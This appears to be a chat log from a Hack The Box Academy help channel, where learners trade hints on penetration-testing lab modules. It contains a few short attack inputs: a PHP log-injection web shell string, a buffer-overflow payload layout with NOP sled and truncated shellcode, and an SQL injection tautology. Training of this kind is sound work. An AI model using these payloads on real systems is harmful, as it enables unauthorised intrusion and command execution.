Tell me where I am stupid please
What module is this regarding?
imagine Microsoft is using only that key 😹
that is just an example
also the key is indeed 32 bits in hexadecimal
I believe they are using only that key for gpp encryption
referring to ||keytabs|| ?
Nope
It's related to the solution you found in the question before that. Maybe you can use that in a search.
Again you're thinking too narrow. You've technically already used a file of that type iirc from that section
@late crow check your dm
But again reading the section tells you the different types
I am not sure, you might wanna ask Microsoft themselves.
I referred to this resource https://adsecurity.org/?p=2288
I'm so stuck..
Sir I will tell you right now, you do indeed have everything you need, I just think you're overthinking it
have you tried what it tells you about the PowerSploit module
Hi! Absolutely stuck in https://academy.hackthebox.com/module/112/section/1079 I see the RDP port open and the MSSQL port closed.
Sometimes a service is only available internally
Yup, i suppose that MSSQL is in internal subnet. But have no tips about the user to try to connect to RDP
Well maybe there's more open than you're seeing, did you do a full port scan of the target?
I should also be using the server time right? not my own time zone?
When you click on the button, you will be given a time. From this time you have to create a token one second back and one second forward for each millisecond.
just abuse the give time is UTC
given
you do not have to use the given time directly in the script to solve the question
If you click the button with your script, then you know the exact time. Otherwise you have to use the time that is given. Because the token that is generated. +/- 1 second from the given time is generated.
Can any one make me a free logo?
First you need to click a button on the page. Then a user token will be created.
In the time range +/- 1 second a second token (Admin Token) is created.
The user token and the time will be displayed. From there you can calculate the Admin Token.
how long does the bruteforce normally take lol
For 2001 tokens? Not very long
yes and jajaja
i did the button request with curl instead within the python script because of laziness
Haha, you could have just clicked the button on the page. That would have been even lazier
i was like maybe im slower HAHAHAHA
Then you only have to transfer the time that is displayed into your script and run your script.
that is done with datetime library?
Motherclucker.. I did it!
You get really humbled when you find the solution after this amount of time
and feel stupid ^^
Like I said you had all the info, you just over thought what was staring at you
Need to keep reminding myself to pay attention to the details, both in the q and the text
Yep this is why proper note taking is important, not just copy/paste word for word
Bc tbh learning how to parse fluff out of text is a super useful skill, word problems in math really help with that
I'm in the server, now stuck to loggin MSSQL 🫡
There's an important document to find before moving forward
Yup, found in ||NFS directory||. But stuck in MSSQL console
Honestly this module doesn't do a great job at explaining mssql and only really tells you about the GUI
Thats not the documentation I'm talking about, it's something the user you have access to has - you're not gonna get anywhere in mssql as the given user, you'll need to escalate
the section was Nmap Scripting Engine
I did look at the hint
You're probably overthinking it, just use the http scripts as shown in the section
I did and was was asking do I need to try one of the many exploits
No
Exploiting is not needed
Check the robots.txt of the webserver if I'm recalling right
Which is what the http script should do
Try sudo nmap <target> --script='http*'
In the Module "Using the Metasploit Framework" I cannot figure out the exact wording for the answer to the second question "Which version of Metasploit is free and can be used only through a CLI?"
Can someone help please?
I tried the robots.txt flag and it told me it wasn't correct
The question is really basic but I'm still not sure if I should post the answers I tried here. I tried different casing also using one word or two words or an abbreviation. All to no avail.
If you read the section carefully it will tell you: hint I believe it's the tool you use frequently
Do they mean the actual executable, rather than the name of the product? 🤦♂️
Yeah, they do. That is a very frustratingly worded question!
Especially because in the question right above it, they asked for the name of the product.
But thanks @fathom pendant ! 🙂
The answer is both
I got it to work I must have had an extra space or something
That's not clear from the text of the module, let alone the graphics. Most of the text speaks of "Metasploit Pro" vs "Metasploit Framework". At least at first. Later it seems to be used interchangeably.
Msf stands for Metasploit framework and then console
I know. But at least to me, the wording was misleading.
I may also just be a bit sore about those 0-cube questions in general. They feel like an unnecessary chore to me, because most can be answered without thinking and when they can't it tends to be a wording or case problem. That just feels annoying to me.
That being said. I am aware that my being annoyed by such a trivial thing is irrational and I'll shut up about it now. 🙂
Hello, I have a question, I'm doing the brute force module and I need do to my first bruteforce attack to validate a question but I would like to do it on my own vm (parrot htb linux). they say that I can find a passwordlist on /opt/useful/SecLists/Passwords/Default-Credentials but there is nothing in my vm, I can only find it on the vm of the website
Did I miss something when I set up my vm?
brute force module?
That question annoyed me too
seclists does not come preinstalled on Parrot
"LOGIN BRUTE FORCING"
just git clone the repo somewhere in your system
oh ok, there is nothing explained on this in the module
where can I find this seclist?
Usually there's a link to tools in the section
you are 1 google search apart from the answer
ok yes ty I found it
any time
Nah it's a shitty question altogether but it's whatever
so I have the link : https://github.com/danielmiessler/SecLists. Do I have to navigate on etc then I do git clone https://github.com/danielmiessler/SecLists ?
its the first time i do that ^^
If you want to
Or you can git clone to your home directory
And just reference it from there in your commands
how are you in the login brute force module
┌[parrot@wary creek]-[14:00-06/10]-[/etc]
└╼$ git clone https://github.com/danielmiessler/SecLists
fatal: could not create work tree dir 'SecLists': Permission denied
/etc is a write protected directory
i suggest you do easier modules
sudo
first understand the basics
i already did the linux fundamental
sure?
clone into the /opt dir
Information Security Fundamentals is a good path to do
i have the same error message on /opt
is it the right command git clone https://github.com/danielmiessler/SecLists ?
you are asking questions that in my opinion you shouldn’t be asking if you could make your way to that module
you need sudo permission
or do I have to modify something?
in previous modules of the cbbh path you had to use tools such as git clone
oh ok it works now
They probably aren't doing a path
I'm sorry for these questions, i just didn't remember all the module
Not everyone doing modules is doing a learning path
Practice makes perfect: and understanding the errors you get
I think I have these prerequisites, I just never did a git clone before
you asked about a permission denied
also knowing how to install tools from github is a prerequisite
These are the only recommended pre-requisites for this module btw
I did all these modules
permission denied error/solution is explained under Linux Fundamentals
but they never ask to do a git clone
Permission denied = probably need to be root
File not found = File does not exist in the path provided
and i believe git clone is explained somewhere also
just want to confirm question from Username Injection where you need to reset the password to escalate from htbuser to htbadmin. This is also a bruteforce question right? as the steps dont work to reset the password without the old password
nop
keep trying stuff
Usually the sections go over how to install a tool if you don't already have it
Sometimes they don't
answer is easier than you think but you have to try things based on the GET parameters
okay, i solved it, but dont understand why it worked lol
because i reset the password once to get the full functionality and check the requests inside of burp, then following the module steps it didn't work
reset the box, did it as the first step, and it worked
you have to send the username parameter twice
one for each user
and it is not sanitized
so it takes the oldpasswd parameter right for the htbuser but also processes it for the admin
anyone else having trouble running ssh2john from the pwnboxes?
I get the following error:
needs python <3.9
wow cheers
Python2 ssh2john
should really be a disclaimer in module for that
Eh for the most part it's not a huge issue, the major difference is that the function call for decoding got renamed from 2.7 > 3+
I mean you can always check C:\Users
That's weird let me check my answer
Ahhhh OK, read the provided hint
That should point you in the right direction
There was a section that talks about impersonating users
Don't forget to GO xD
No advances
Did you find the IMPORTANT DOCUMENT
No
Browse the files you have access to as a*. I don't recall if you can use the file explorer search feature to look for "important"
Hi guys I'm reading the BufferOverflow in linux based
This calculation was made
Buffer = "\x55" * (1040 - 124 - 95 - 4) = 817
NOPs = "\x90" * 124
Shellcode = "\xda\xca\xba\xe4\x11...<SNIP>...\x5a\x22\xa2"
EIP = "\x66" * 4
Why NOPS is 124 ? In the previous section they didn't explain why
It's for the section "Generating shellcode"
I understand why 95 - 1040 - 4
but not the 124
i dont understand the instructions in the C# assessment: Am I supposed to be GetAsyncing urls such as http://10.129.nnn.nnn/<item_from_wordlist_class>/ such as "http://10.129.100.100/foobarbaz/" i assumed this was what they are asking for and some of the urls would return a file listing from the web server.. i get nothing but 404.
The exact number doesn’t matter too much, you want a bunch of nops before the shell code so that you have a bit of flexibility with the address you jump to. If you jump to any nop the cpu will slide down all the nops until it reaches the first real instruction. Otherwise you’d have to ensure you jump to the exact starting address of the shellcode. With a big nop sled you can guess the starting address easier and the exploit becomes more stable as a result. Technically you could do it with 0 nops
Thank you so much my friend
Hi everyone, need help with HTTP Attacks: Log Injection. I double encode the payload Malicious message from yahmasta (10.30.12.72): %3fphp system(_GET[cmd])%3b %3f but get the following response. PHP is not executing. Anyone has a nudge?
In the Firewall and IDS/IPS Evasion - Easy Lab (NMAP) its asking me to identify the OS and I came back with a linux machine in my results but it says its incorrect. this is the command I used to get those results: sudo nmap 10.129.2.80 -O --packet-trace -T2 --disable-arp-ping -D RND:10
hello, can anyone help me with how to start with seasonal machines (visual)?
Follow these steps to verify your HTB account: #welcome message
After that you'll unlock many other channels in this discord server, like #1157735501516779711 which is a more appropriate place to ask that question
Hi there! Could someone please explain to me why I only get the header when using cURL, but the whole request when doing the same request in Burp Suite?
I'm super confused... When using curl without '-i' I even dont get any feedback on my request.
Yes, I'd like to receive the JSON file in curl too
Tried already... Doesn't work unfortunately
nevermind
You were right... Could you explain shortly why that's the case?
I copied the original request in both the developer tools and burp suite. Both didn't give me the json object in their request
you are sending some data through the GET request
and the server is not expecting ut
it
with the --data-raw
Alright, and Burp Suite automatically doesn't send it when I changed it to a Get request?
Thanks Rafa! That's super helpful! 🙂
any time dude
Yes, that's from the original POST request 🙂
Burp can handle that automatically
Perfect, thanks again for the help! Much appreciated!
🙂
sometimes the services running on a machine can help us reveal what OS the machine is using
hint: you don’t need the -O option
Also linux is just the architecture, they're looking specifically for which linux, Ubuntu, Parrot, Kali, etc.
hey friends, hope you're having good times. i am at Windows Privilege Escalation Citrix Breakout, already got to cmd, but i can't import modules because of this error. do i have to deal with this or do i have to find another thing to do? i can't do as told in the section because of it
but on the right track
Hey guys, can anyone help me please with the XSS https://academy.hackthebox.com/module/103/section/984
i am getting old with this 😦
use the -sV option
heard thanks
Found the IMPORTANT DOCUMENT, now stuck again hahaha trying to execute MSSQL Manager as Administrator (here cannot put the @ character) or trying to connect by SQL Server Auth or Windows Auth to MSSQL Manager with sa/admin/Admin but login fails
Completed! Thanks a lot for the help
Is a crypto module something to expect in the foreseeable future? Would be really helpful.
same here
same
Academy.hackthebox.com won't load? Or, having problems with Academy.hackthebox.com? Check the status here and report any issues!
rip
bruh
All good. Because we will get a week. But I will get a heartattack.
SQL injection question:
SELECT * FROM logins WHERE username='admin' or '1'='1' AND password = 'something';
Even if we used '1'='2' (which returns false), would this statement ultimately return true because the username admin exists?
You could see this as a general boolean algebra problem, really. Your checks are:
- username='admin'
or
- '1'='1'
and - password = 'something'
Since '1'='1' is always true, this last part is the same as true AND password = 'something'
which is the same as simply password = 'something'
if you change it to '1' = '2' which is false, you've got false AND password = 'something' which is always going to be false
because of your or which separates the last bits with the first bit, the only relevant part of that query is:
SELECT * FROM logins WHERE username='admin'
But the username='admin' evaluates to true, so it will always evaluate to true regardless of '1'='1'
AND operator is evaluated first.
So yes, if admin exists, you'll get something back regardless of what the rest is, because of your or
gotcha. So the statement in the module below is kinda wrong?:
Since 1=1 always returns true, this query will return true, and it will grant us access.
In this context where we are using admin as the username?
I'm assuming the query is something like SELECT * FROM user WHERE username = 'admin' AND password = <your-input-here>
Any downtime will be comped as added time to the exam period